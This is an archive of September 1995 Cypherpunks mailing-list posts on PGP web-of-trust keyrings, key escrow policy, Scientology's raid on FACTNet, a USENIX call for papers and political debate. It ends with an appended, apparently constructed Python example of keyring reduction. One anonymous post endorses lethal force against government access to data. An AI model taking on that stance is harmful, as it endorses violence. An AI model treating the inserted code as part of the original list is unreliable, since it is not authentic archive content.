Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From don at cs.byu.edu Thu Sep 7 19:58:18 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Thu, 7 Sep 95 19:58:18 PDT Subject: Announce: Web of Trust Ring Message-ID: <199509071832.MAA00480@wero.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- WEB OF TRUST KEYRING GENERATION PROJECT I have completed my project to make a condensed version of the keyserver PGP keyrings, containing only the "web of trust" inter-related keys. My methods were rather crude, and unfortunately only extracted those people who have signed someone (already on the list) else's key. That means that people who are well connected on the web of trust are included, while those people who only receive signatures from well-connected people are not included. The keyfile is approximately 1 megabyte, as opposed to 5-6 in the keyservers. Building it required 12 successive passes to the MIT keyring, each requiring 4-6 hours on my poor 386. I also made a subsequent pass using the UNIMI keyring. To seed the list I used warlord at mit.edu (Uh Derek? Hello??) and those keynumbers that cpunks mailed me. (Unfortunately some people sent only their key blocks, which I didn't use. Also, my server "lost" mail _twice_ due to "disk crash" while I was collecting key numbers.) I assume that requiring 13 passes means that the longest possible chain with a single connection (not necessarily a trust connection) to one of the seed keys is 12 keys. All included keys are exactly as they are on keyservers. The keyring can be trivially validated as much as possibly simply by validating one of the well-connected keys, like the ones that come with PGP. Warning: not responsible for assigning trust levels for all those people. That's your job. Have fun. Why did I do this: 1) Because I wanted to. 2) Because I really had nothing better to do with my CPU time. 
3) wait, wait, ok for reals: 1) Because I want a web of trust keyring for myself, and that big old 5+ meg clunker keyfile is tooooo slow to use. 2) Because I feel that a DNS-style keyserver would not suit many web-of-trust activities that I wanted the keyring for, IE: pgp aware tools like news and mail readers for on-the-fly validation. 3) Because I feel that a system like this would encourage strengthening the web-of-trust, ie, trusting the KEYS. The current system has a lot of disjointed keys (uh, 4 meg worth I guess, eh?) which I found myself trusting simply because they were on the Keyservers. While this facilitates creation of a stable nym(*), real or not, I found myself even trying to justify to others trusting a key simply because it was on a keyserver. * = I agree with Bill Steward that we are a bit obsessed on True Names(tm) bit. I understand when Someone(tm) like Derek Atkins wants to see a True Name ID card(tm), but I'm sympathetic to having Nym signing, with the problem to overcome being simply the man-in-the-middle thwarting. Updates: Currently I am not really planning to do much in the way of updates to this, unless people actually are interested in updates. To be frank, this keyring is what I'm dropping into my own PGP, other than that it's not too exciting. If you get a copy, please tell me what you think of the project. The location is ftp to bert.cs.byu.edu, pub/donring.pgp. Unfortunately I don't know if you can tack that together as a ftp:// address. If you do, try ~ftp/pub/donring.pgp for good measure. I have suggested in the past that keyserver software could be modified to update the web of trust (using a keyfile such as mine for a base) instead of accepting just any key. I am not capable of making such modifications to the keyserver program, nor do I know of a keyserver operator who is willing to run such a system. 
A "for real" web of trust keyserver would want to fully expand my keyring by adding what I left out - those keys who are signed by included keys, but are not themselves included because they were not a seed and have not signed an included key. Having coded that, an update system that checks for a relation to an already-included key would be trivial. A second issue is that "The Web" of trust depends on the keys used to seed it. It's very possible that many of unimi's (for example) key file (500k bigger than MIT) keys do not have signatures connecting them to the people who came out with PGP, but have a robust web of trust nonetheless. Unless the project can obtain a seed which connects to that web, none of it is included. However, as I stated, that is a fact which will _encourage_ people to seek each other out for key signing. I suppose I could also make a list of the keyring generation script, if anyone actually wanted to ftp it. It would take between 15 and 35 hours to run on a 386 Linux box such as mine, mere hours on a big, fast box. There is really no need for it except to regenerate the keyring, for paranoia purposes or other reasons. Don -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBME6dqsLa+QKZS485AQFiBwL/boAb6BOdvcVHVyV+rGRmMTNk8iibcXvX kdngbRLrBEc2r4pJkuNpDvT2M/GmmGEGYxiAXKV9LDmWa7RLnCicjidP1RJVcu+3 xtVeO9PF+4ZecgEUJl4j6JdPEE52guOr =nm0W -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed * This user insured by the Smith, Wesson, & Zimmermann insurance company *

From modemac at netcom.com Thu Sep 7 20:15:52 1995 From: modemac at netcom.com (Modemac) Date: Thu, 7 Sep 95 20:15:52 PDT Subject: Scientology tries to break PGP - and fails? Message-ID: <199509080312.UAA03808@netcom15.netcom.com> News Flash!
According to an informed source, the so-called "church" of Scientology is trying to force Larry Wollersheim to give them his de-encryption code for PGP. Larry Wollersheim is the director of FACTNet, a Colorado BBS that specializes in distributing information about religious cults - especially the Church of Scientology. Scientologists raided FACTNet recently and seized its hardware and records, in a case that has spread news of the Scientology wars all over the Internet. Scientology has been in possession of Larry Wollersheim's computer records for quite a while now - at least three weeks, I believe. They have been scanning it for what they claim to be "copyright violations." Yet, their list of scanning criteria also includes a list of 34 names of their critics and enemies, including a famous Netizen named "Rogue Agent." Yet it seems that despite all their efforts to get what they want, they can't break PGP - so they have to force Wollersheim to reveal the key. Mr. Wollersheim has stated that he will go to jail before he reveals his encryption key. Please forward this note to all interested parties. Call this one: BIG WIN FOR PGP! For more information on Scientology's war against the Internet, read the many Web pages set up to cover the story. My own page, an "Introduction to Scientology," is: http://www.tiac.net/users/modemac/cos.html It includes a link to the FACTNet Web page, as well as Ron Newman's famous Web page: "The Church of Scientology vs. the Net."

From tcmay at got.net Thu Sep 7 20:26:22 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Sep 95 20:26:22 PDT Subject: Correction about who opposes crypto regulations.... Message-ID: At 2:16 AM 9/8/95, hallam at w3.org wrote: >>Nope. but the patriots & the cyPHerpunks share a common goal, and belief >>that it is none of the government's business what we think or want to >>share with our computers.
> >Poor you, the only major political party to come out with a pro crypto >statement >is a socialist party. On the contrary, the Libertarian Party has come out strongly in favor of cryptography and privacy, and they are consistently either #3 or #4 in popularity. (I believe Peace and Freedom is usually #4 and LP is usually #3.) Their home page (http://www.access.digex.net/~lphq/lphq.html) says: "The LPHQ is the center of activities of the Libertarian Party, the third largest political party in the U.S. We stand for individual liberty, both in terms of personal and financial freedom." It is impossible to argue that the Libertarian Party is opposed in any way to the right to encrypt, and their 1994 platform makes this clear: "We oppose all proposed regulations of civilian research on encryption methods. We also oppose government classification of such research or requirements that deciphering methods be disclosed to the government." I point this out not to argue in favor of the LP here, but to correct a seriously incorrect statement. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Thu Sep 7 20:31:29 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Sep 95 20:31:29 PDT Subject: Shams and Shame Message-ID: At 2:34 AM 9/8/95, Pat Farrell wrote: >I am even willing to type in some, but that is known to cause typos, >as I can't type, and even spellcheckers can't tell real words >such as 'sham' from 'shame' Yeah, it's a real sham you can't spel. --Tin May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From frissell at panix.com Thu Sep 7 20:40:09 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 7 Sep 95 20:40:09 PDT Subject: cryptography eliminates lawyers? In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Black Unicorn wrote: > Telecoms will certainly break the professional > > monopoly of lawyers (and other professionals). > > This I don't. How do you mean exactly? Licensing requires the ability to outlaw unlicensed transactions. Since the Net trumps censorship and allows consultations at a distance, it cracks licensing, DCF From dr261 at cleveland.Freenet.Edu Thu Sep 7 21:06:29 1995 From: dr261 at cleveland.Freenet.Edu (Tobin T Fricke) Date: Thu, 7 Sep 95 21:06:29 PDT Subject: Notes from NIS&T Key Escrow Export conference. Message-ID: <199509080406.AAA25183@kanga.INS.CWRU.Edu> >I hope this gets to you before the conference is over. I would REALLY >like to hear the government response to the question: >"If keys are escrowed, what purpose does a 64 bit limit serve?" I thought that Bruce Schneier (sp?) had a good point at DefCon: (something like:) "The US Government thinks that there is a type of criminal smart enough to use encryption and dumb enough to use encryption provided by the US Government..."(lots of applause). I think that is a good point. Of course, if all non-escrowed encryption techniques were made illegal, then the criminals would just have another broken law under their belt if they used strong encryption. After all, an outlaw is an outlaw because he has broken laws, so what sense does it make to make more laws for him to break? Hmph. 
Also, semi unrelated: How do the copyright, pornography, and California Penal Code 502.7 laws fit in with the first amendment? [Please send a cc: of any replies to dr261 at cleveland.freenet.edu because I am no longer on cypherpunks )-: I can't handle the mail volume any longer now that I have homework to do.. ] -- Tobin Fricke (aka LightRay) The Digital Forest BBS (714)586-6142 dr261 at kanga.ins.cwru.edu KE6WHF Amateur Radio, 1:103/925 fido

From joelm at eskimo.com Thu Sep 7 21:29:12 1995 From: joelm at eskimo.com (Joel McNamara) Date: Thu, 7 Sep 95 21:29:12 PDT Subject: NIST Escrow Papers - Now Web Available Message-ID: <199509080429.VAA22176@mail.eskimo.com> Several of the scanned hand-outs (courtesy of John Young) for the NIST September 5 workshop on key escrow are now available on my Web page: http://www.eskimo.com/~joelm Papers include: The outlines of meeting topics of Raymond Kammer of NIST and Michael Nelson of the White House. (KAMMER.TXT - 7kb) Discussion Paper No. 4, "Example Potential Solutions for the Draft Export Criteria for Software Key Escrow Encryption," which offers example solutions for each of the ten criteria. (CRITERIA.TXT - 7kb) The Business Software Alliance's dissenting blast at the government's key escrow proposal and export limit. This paper was loudly applauded. (BSA.TXT - 19kb) Trusted Information Systems' "Thoughts on the NIST Escrow Issues Meeting Discussion Papers." (TIS.TXT - 27kb) TECSEC Incorporated's "Private Escrow Key Management: A Method and its Issues." (TECSEC.TXT - 13kb) Dorothy Denning's "Comments on Draft Criteria for Software Key Escrow Exportability" and "Comments on Issues for Key Escrow Agents." (DENNING.TXT - 8kb)

From yihchun at u.washington.edu Thu Sep 7 21:38:04 1995 From: yihchun at u.washington.edu (Yih-Chun Hu) Date: Thu, 7 Sep 95 21:38:04 PDT Subject: ON OFF-TOPIC In-Reply-To: <9509080216.AA07325@zorch.w3.org> Message-ID: On Thu, 7 Sep 1995 hallam at w3.org wrote: > > >Nope.
but the patriots & the cyPHerpunks share a common goal, and belief > >that it is none of the government's business what we think or want to > >share with our computers. > > Poor you, the only major political party to come out with a pro crypto statement > is a socialist party. I think the libertarian position is inherently pro-crypto. Besides, the French are socialist, and well, as far as crypto goes... > > The problem is currently with the right wing, right wing democrats such as > Clinton and practically all the Republicans. > Whatever. Clinton proposed crypto, some democrat wrote the electronic decency act. (In fact Gingrich was against it) > If you want a debate on how to convince the authoritarians then perhaps you will > get some interest. Trying to make crypto control out to be a left/right or > pro/anti gun control issue is no more relevant than the pro/anti abortion > debate. I think that to some extent it is very relevant to gun control in that both can be abused and that both help the law-abiding citizen do things.
+---- Yih-Chun Hu (finger:yihchun at cs.washington.edu) ----------------------+ | http://www.cs.washington.edu/homes/yihchun yihchun at cs.washington.edu | | http://weber.u.washington.edu/~yihchun yihchun at u.washington.edu | +---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+ | 1024/E50EC641 B2 A0 DE 9E 36 C0 EB A6 F9 3E D2 DD 2F 27 74 79 | | 2047/DF0403F9 18 EB 62 C8 7F 06 04 67 42 76 24 E2 99 D1 07 DC | +---- Random Thought ------------------------------------------------------+ |I conducted an experiment to test Murphy's Law, but everything went wrong.| +--------------------------------------------------------------------------+ From rsalz at osf.org Thu Sep 7 21:38:16 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 7 Sep 95 21:38:16 PDT Subject: Usenix symposium on crypto applications Message-ID: <9509080437.AA08201@sulphur.osf.org> Newsgroups: comp.org.usenix,comp.org.uniforum,comp.org.sug,comp.unix.admin,comp.unix.large,comp.org.decus,comp.security.unix Path: paperboy.osf.org!bone.think.com!blanket.mitre.org!agate!spool.mu.edu!howland.reston.ans.net!tank.news.pipex.net!pipex!in2.uu.net!usenix!toni >From: toni at usenix.org (Toni Veglia) Subject: 6th USENIX UNIX Security Symposium - Call-for-Papers Message-ID: Reply-To: toni at usenix.org (Toni Veglia) Organization: USENIX Association, Berkeley, CA Date: Wed, 6 Sep 1995 19:25:37 GMT Lines: 218 Xref: paperboy.osf.org comp.org.usenix:3623 comp.org.uniforum:20 comp.org.sug:940 comp.unix.admin:33851 comp.unix.large:1699 comp.org.decus:6147 comp.security.unix:19702 Announcement and Preliminary Call for Papers 6th USENIX UNIX Security Symposium Focusing on Applications of Cryptography July 22-25, 1996 Fairmont Hotel San Jose, California Sponsored by the USENIX Association, the UNIX and Advanced Computing Systems Professional and Technical Association Co-sponsored by UniForum (pending) In cooperation with: The Computer Emergency Response Team (CERT), and IFIP WG 11.4 Important Dates 
Dates for Refereed Paper Submissions Extended abstracts due: Mar 19, 1996 Program Committee decisions made: Apr 15, 1996 Camera-ready final papers due: June 10, 1996 Registration Materials Available: End April 1996 Program Committee Program Chair: Greg Rose, Sterling Software. Fred Avolio, Trusted Information Systems, Inc. Steve Bellovin, AT&T Bell Laboratories Brent Chapman, Great Circle Associates Diane Coe, Mitre Ed DeHart, CERT Dan Geer, Open Market Inc. Peter Gutmann, University of Auckland Kent Landfield, Sterling Software Clifford Neuman, Information Sciences Institute Avi Rubin, Bellcore Eugene Spafford, COAST Laboratory, Purdue University Ken van Wyk, Defense Information Systems Agency Karen Worstell, The Boeing Company Readers: Matt Bishop, U.C. Davis; Phil Karn, Qualcomm Overview The goal of this symposium is to bring together security and cryptography practitioners, researchers, system administrators, systems programmers, and others with an interest in applying cryptography, network and computer security, and especially the area where these overlap. The focus on applications of cryptography is intended to attract papers in the fields of electronic commerce and information processing, as well as security. Please note that papers about new cryptographic algorithms are not solicited; however new applications are. This will be a four day single track symposium with tutorials, refereed and technical presentations, and panel discussions. Tutorials will take place the first two days followed by two days of technical sessions. Tutorials July 22-23 Tutorials for both technical staff and managers will provide immediately useful, practical information on topics such as local and network security precautions, what cryptography can and cannot do, security mechanisms and policies, firewalls and monitoring systems. Technical Sessions July 24-25 In addition to the keynote presentation, the technical program includes refereed papers and invited talks. 
There may be panel sessions. There will be Birds-of-a-Feather sessions and Works-in- Progress Reports on two evenings. You are invited to make suggestions to the program committee via email . Papers that have been formally reviewed and accepted will be presented during the symposium and published in the symposium proceedings. Proceedings of the symposium will be published by USENIX and will be provided free to technical session attendees; additional copies will be available for purchase from USENIX. Symposium Topics Presentations are being solicited in areas including but not limited to: *Anonymous transactions *Applications of cryptographic techniques *Attacks against secure networks/machines *Cryptanalysis and codebreaking as attacks *Cryptographic tools *Electronic commerce security *Firewalls and firewall toolkits *Legislative and legal issues *Case studies *Computer misuse and anomaly detection *File and File system security *Network security *Security and system management *Security in heterogeneous environments *Security incident investigation and response *Security tools *User/system authentication *Penetration testing *Malicious code analysis Note that this symposium is not about new codes or ciphers, or cryptanalysis for its own sake. How to Submit a Refereed Paper Submissions must be received by Mar 19, 1996. Authors are encouraged to submit an extended abstract which discusses key ideas and demonstrates the structure of the finished paper. Extended abstracts should be 3-5 pages long (about 1500-2500 words), not counting references and figures. The body of the extended abstract should be in complete paragraphs. The object of an extended abstract is to convince the reviewers that a good paper and presentation will result. Full papers can be submitted if they are complete in advance of the date. Full papers should be 8 to 15 typeset pages. Authors will be notified of acceptance on April 15, 1996. 
All submissions will be judged on originality, relevance, and correctness. Each accepted submission will be assigned a member of the program committee to act as its shepherd through the preparation of the final paper. The assigned member will act as a conduit for feedback from the committee to the authors. Camera-ready final papers are due June 10, 1996. Please accompany each submission by a cover letter stating the paper title and authors along with the name of the person who will act as the contact to the program committee. Please include a surface mail address, daytime and evening phone number, and, if available, an email address and fax number for the contact person. If you would like to receive detailed guidelines for submission and examples of extended abstracts, you may send email to: securityauthors at usenix.org or telephone the USENIX Association office at +1 510 528 8649. The UNIX Security Symposium, like most conferences and journals, requires that papers not be submitted simultaneously to another conference or publication and that submitted papers not be previously or subsequently published elsewhere. Papers accompanied by "non-disclosure agreement" forms are not acceptable and will be returned to the author(s) unread. All submissions are held in the highest confidentiality prior to publication in the Proceedings, both as a matter of policy and in accord with the U.S. Copyright Act of 1976. Where To Submit Please send one copy of an extended abstract or a full paper to the program committee via each of two, for reliability, of the following methods. All submissions will be acknowledged. o Preferred Method: email (Postscript or ASCII) to: securitypapers at usenix.org o Alternate Method: postal delivery to Security Symposium USENIX 2560 Ninth St., Ste. #215 Berkeley CA 94710 U.S.A. 
Phone: +1 510 528 8649 o Fax: +1 510 548 5738 Registration Materials Materials containing all details of the technical and tutorial programs, registration fees and forms, and hotel information will be available at the end of April 1996. If you wish to receive the registration materials, please contact USENIX at: USENIX Conference Office 22672 Lambert Street, Suite 613 Lake Forest, CA USA 92630 +1 714 588 8649; Fax: +1 714 588 9706 email: conference at usenix.org Information can also be found under the USENIX Association WWW page URL: http://www.usenix.org From don at cs.byu.edu Thu Sep 7 21:47:47 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Thu, 7 Sep 95 21:47:47 PDT Subject: Ring: Server problem Message-ID: <199509072022.OAA00701@wero.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- AAAAAAAAAAAKKKKKKKKK My server has had problems with both incoming ftp and rz. Not only is it very flakey, but they've mis-applied a timeout lately, meaning I have to press a key every 10 minutes during ftp or the process gets killed. Oh, and they did that just before becoming very busy. I delayed announcing my keyring until I could physically transfer the keyring by disk. After getting mail reporting it being corrupted, I had to delete it. It's possible that when I mounted my disk, it could have defaulted into an ascii conversion. I am currently trying to uuencode the entire file and mail it to myself from my local machine. (Heh) If that fails, the keyring will unfortunately not be available until tomorrow, when I can physically transfer it. Sorry for the delay. 
Don -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBME9UYcLa+QKZS485AQFiAAL/bOEgCAeQVPfIzaU3fbRzowK+Wh+lwgaY TY/O9DssheM34qbQcaM3qx9/7Gv4J+kamvhNOgNPhInsQ9ZATKFFtfbPTKimH/jm dP6g51WxbhdQV6mUdXoPT1z1yFAUPEiL =HaPy -----END PGP SIGNATURE-----

From nobody at REPLAY.COM Thu Sep 7 21:50:51 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 7 Sep 95 21:50:51 PDT Subject: GAK In-Reply-To: Message-ID: <199509080450.GAA29735@utopia.hacktic.nl> In article , bdavis at thepoint.net (Brian Davis) wrote: >I, of course, know of the "dislike" of GAK here. I am curious to know, >however, if the "dislike" is because government would have access under >any circumstances or if the primary worry is that government will cheat >and get access when most would agree that they shouldn't (either by the >judge "cheating" or a TLA stealing it). Speaking only for myself, I would resist government access to my data or property. Court ordered warrant or not. I firmly believe that the majority of "lawful" acts the government in its various incarnations commits every day is in violation of not only the US Constitution, but of the natural rights given to me as part of my humanity. I therefore hold that I have the right, if not the duty, to resist these acts in any way possible, up to and including the use of lethal force. The number of citizens who share this opinion is growing every day. --anon, due to the denouncement of the Bill of Rights by the criminals in high office.

From bdavis at thepoint.net Thu Sep 7 22:00:47 1995 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 7 Sep 95 22:00:47 PDT Subject: ON OFF-TOPIC In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Yih-Chun Hu wrote: > On Thu, 7 Sep 1995 hallam at w3.org wrote: > > Whatever. Clinton proposed crypto, some democrat wrote the electronic ^^^^^^^^^^^^^^^^^^^^^^^ Sorry. Clipper precedes Clinton. > decency act.
(In fact Gingrich was against it) EBD

From dr261 at cleveland.Freenet.Edu Thu Sep 7 22:46:38 1995 From: dr261 at cleveland.Freenet.Edu (Tobin T Fricke) Date: Thu, 7 Sep 95 22:46:38 PDT Subject: Magazine / Goodbye Message-ID: <199509080546.BAA27342@kanga.INS.CWRU.Edu> Hello, everyone.. I am posting this to let everyone know that I am starting a semi-technical magazine titled _The_Carrier_Wave_. It will be published every two months to begin with, and hopefully monthly if I receive enough material. I am requesting articles, columns, news, bits, etc.. Whenever anything -interesting- happens, I'd appreciate it if someone could write a long or short blurb about it and forward it to me. Events, meetings, tradeshows, milestones, new algorithms... Stories about PGP, Clipper, etc... Use this to get the word out. If someone could run a "Cryptography Column" or "CryptoNews" or a Cypherpunks column, that would be great... If you are interested, please send me mail at dr261 at cleveland.freenet.edu.. Also note, I have unsubscribed from Cypherpunks because I will be very busy lately and an overflowing mailbox is undesirable. Thanks! !!! -- Tobin Fricke (aka LightRay) The Digital Forest BBS (714)586-6142 dr261 at kanga.ins.cwru.edu KE6WHF Amateur Radio, 1:103/925 fido

From jlasser at rwd.goucher.edu Thu Sep 7 23:31:04 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Thu, 7 Sep 95 23:31:04 PDT Subject: ON OFF-TOPIC In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Yih-Chun Hu wrote: > > The problem is currently with the right wing, right wing democrats such as > > Clinton and practically all the Republicans. > > > > Whatever. Clinton proposed crypto, some democrat wrote the electronic > decency act. (In fact Gingrich was against it) Well, Gingrich SAID he was against it. But he hedged even on that, and he certainly didn't DO anything about his opposition to it, unlike his actions with regard to things he truly supports.
Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From wilcoxb at nag.cs.colorado.edu Thu Sep 7 23:35:23 1995 From: wilcoxb at nag.cs.colorado.edu (Bryce Wilcox) Date: Thu, 7 Sep 95 23:35:23 PDT Subject: Announce: Web of Trust Ring In-Reply-To: <199509071832.MAA00480@wero.byu.edu> Message-ID: <199509080635.AAA01087@nag.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- > WEB OF TRUST KEYRING GENERATION PROJECT > > I have completed my project to make a condensed version of the keyserver > PGP keyrings, containing only the "web of trust" inter-related keys. My > methods were rather crude, and unfortunately only extracted those people > who have signed someone (already on the list) else's key. That means that > people who are well connected on the web of trust are included, while > those people who only receive signatures from well-connected people are > not included. A very interesting project! Can you give us some data like how many is the maximum number of hops necessary to connect two people on the WoT? (I am aware that one wouldn't want to trust such a connection, and that PGP doesn't actually allow you to do so for hops > 2...) (P.S. I guess "12" based on the number of passes necessary. That seems like a really high number to me...) Are any obvious pseudonyms in? (I would guess not.) I wonder what sorts of statistical analyses could be done on this WoT? Is it fairly evenly spread out or are the noticeably larger "clumps" of mutual signatures? How many keys *are* there in this (subset of the) WoT? Here's a question: for two randomly selected members of your WoT, how many signatures would a Man In The Middle have to fake in order to isolate the one member from the other? Thanks for this, Don. Bryce signatures follow: + public key on keyservers /. 
island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---* -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Bryce's Auto-PGP v1.0beta3 iQCVAwUBME/kDPWZSllhfG25AQHGFAQApDoogEs7Dv8+ncQYAR7NUStvL2acs9x3 j5aEeF/GpA6kKZD/Rw6FO5vqCXol/fJ0oGgwgTBPzJAF2ZfUQ6P1KQJweAebDuNs 2JlBjEkTpaDgQ6PwPFwzEr02nP06wE0mF5ssdDvd2LcIbVdDY2XB7jyXh4+AC1fP +lRujkScF0M= =/ef6 -----END PGP SIGNATURE----- From stewarts at ix.netcom.com Fri Sep 8 00:00:48 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 8 Sep 95 00:00:48 PDT Subject: Notes from NIS&T Key Escrow Export conference. Message-ID: <199509080700.AAA23137@ix3.ix.netcom.com> At 11:26 AM 9/7/95 -6, Peter Trei wrote: >"If keys are escrowed, what purpose does a 64 bit limit serve?" A 64 bit limit serves lots of purposes, like letting the NSA crack stuff; I suspect escrow is being used as an excuse to get big vendors to standardize on wimpy 64-bit crypto as much as anything else. >Secondarily, I observe that this apparently precludes the use of OTP. Not to the devious (though the devious may not be able to get export approval) After all, you could escrow a _lot_ of 32-bit OTPs :-) (yeah, I know, the requirement that you identify which escrowed key is being used makes that less than useful, unless the final standard comes out with clear, unambiguous language which fails to cover all cases and can therefore be abused - that's one problem with the current "ask the NSA" rule.) #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From starrd at iia2.org Fri Sep 8 00:10:47 1995 From: starrd at iia2.org (starrd) Date: Fri, 8 Sep 95 00:10:47 PDT Subject: Scientology and police visit XS4ALL Amsterdam In-Reply-To: <9509071507.AA08037@cantina.verity.com> Message-ID: On Thu, 7 Sep 1995, Patrick Horgan wrote: > I know who you're referring to by saying co$, but what do co$ mean? > Co-DollarSign? Co-Dollar? 
> Church of $cientology [the $ replacing the S because their true goal is profit, not help] ||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP 7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf 9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig= =0Tlq -----END PGP PUBLIC KEY BLOCK----- From hal9001 at panix.com Fri Sep 8 00:12:11 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Fri, 8 Sep 95 00:12:11 PDT Subject: Why Key Escrow (GAK) is So Bad Message-ID: At 10:22 9/7/95, Timothy C. May wrote: >(Ironically, I just heard about a case in Texas where a judge ordered a >mother to stop speaking in Spanish to her child at home, calling it "child >abuse." The implications of this are self-evident.) You have the facts slightly wrong. The order was no to stop talking Spanish and to use English but only to Not use Spanish EXCLUSIVELY but to also use English (so as to allow the Child to Grow up in a Bilingual Environment). Waiting until the child was old enough to go to school would put the Child at a disadvantage in learning English since the window of Chance for Language Skill Pickup would have closed. 
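The keyring reduction Don describes earlier in this digest (seed keys, then repeated passes adding every key that has signed an already-included key) and the hop-count and man-in-the-middle questions Bryce Wilcox asks about it can be worked through on a small signature graph. The following Python is an added example, not Don's generation script nor any code from the thread; the key IDs and the signature graph are constructed placeholders, not real keys from any keyserver. The functions `ring_by_signers`, `expand_with_signees`, `hop_distances` and `cut_off_by` are names chosen here, not PGP or keyserver APIs.

```python
"""Web-of-trust keyring reduction over a signature graph (added example).

Constructed data: key IDs below are placeholders and the signature graph is
invented to reproduce the situations described in the thread (a key signed by
a seed that never signed anyone; a chain of keys each signing only the key
before it; a separate web with no link to the seed).
"""
from collections import deque

# Constructed signature graph: signer -> set of key IDs that signer has signed.
SIGS = {
    "SEED": {"A", "NOBODY"},   # stands in for a well-known key shipped with PGP
    "A": {"SEED", "B"},
    "B": {"A", "C"},
    "C": {"B"},
    "D": {"C"},                # signed C but never received a signature back
    "E": {"D"},
    "NOBODY": set(),           # signed by SEED but never signed anyone
    "X": {"Y"},                # X and Y form a web with no link to the seed
    "Y": {"X"},
}
SEEDS = {"SEED"}


def ring_by_signers(sigs, seeds):
    """Don's crude rule: on each pass, add every key that has signed a key
    already in the ring. Returns (included keys, passes run), counting the
    final pass that finds nothing new, so a chain of N keys needs N+1 passes."""
    included = set(seeds)
    passes = 0
    while True:
        passes += 1
        new = {k for k, signed in sigs.items()
               if k not in included and signed & included}
        if not new:
            return included, passes
        included |= new


def expand_with_signees(sigs, included):
    """The 'for real' expansion: also pull in keys that are signed by an
    included key, even if they never signed anyone themselves."""
    result = set(included)
    for signer in included:
        result |= sigs.get(signer, set())
    return result


def neighbours(sigs):
    """Undirected view of the web: two keys are adjacent if either signed the other."""
    adj = {k: set() for k in sigs}
    for signer, signed in sigs.items():
        for signee in signed:
            adj.setdefault(signer, set()).add(signee)
            adj.setdefault(signee, set()).add(signer)
    return adj


def hop_distances(sigs, seeds, removed=frozenset()):
    """BFS hop count from the nearest seed for every key reachable through
    signatures, skipping keys in `removed`. Returns {key: hops}; keys with no
    signature path to a seed (X, Y above) are absent."""
    adj = neighbours(sigs)
    dist = {s: 0 for s in seeds if s not in removed}
    queue = deque(dist)
    while queue:
        k = queue.popleft()
        for n in adj.get(k, ()):
            if n in removed or n in dist:
                continue
            dist[n] = dist[k] + 1
            queue.append(n)
    return dist


def cut_off_by(sigs, seeds, included, removed):
    """Included keys that lose every signature path to a seed once the keys in
    `removed` are taken out of the web: a rough measure of how much of the ring
    hangs off a few well-connected keys (Bryce's isolation question)."""
    reachable = set(hop_distances(sigs, seeds, frozenset(removed)))
    return {k for k in included if k not in removed and k not in reachable}


if __name__ == "__main__":
    ring, passes = ring_by_signers(SIGS, SEEDS)
    print(sorted(ring), "passes:", passes)            # NOBODY, X, Y left out; 6 passes
    print(sorted(expand_with_signees(SIGS, ring)))    # NOBODY now included
    print("longest chain:", max(hop_distances(SIGS, SEEDS).values()))  # 5 = passes - 1
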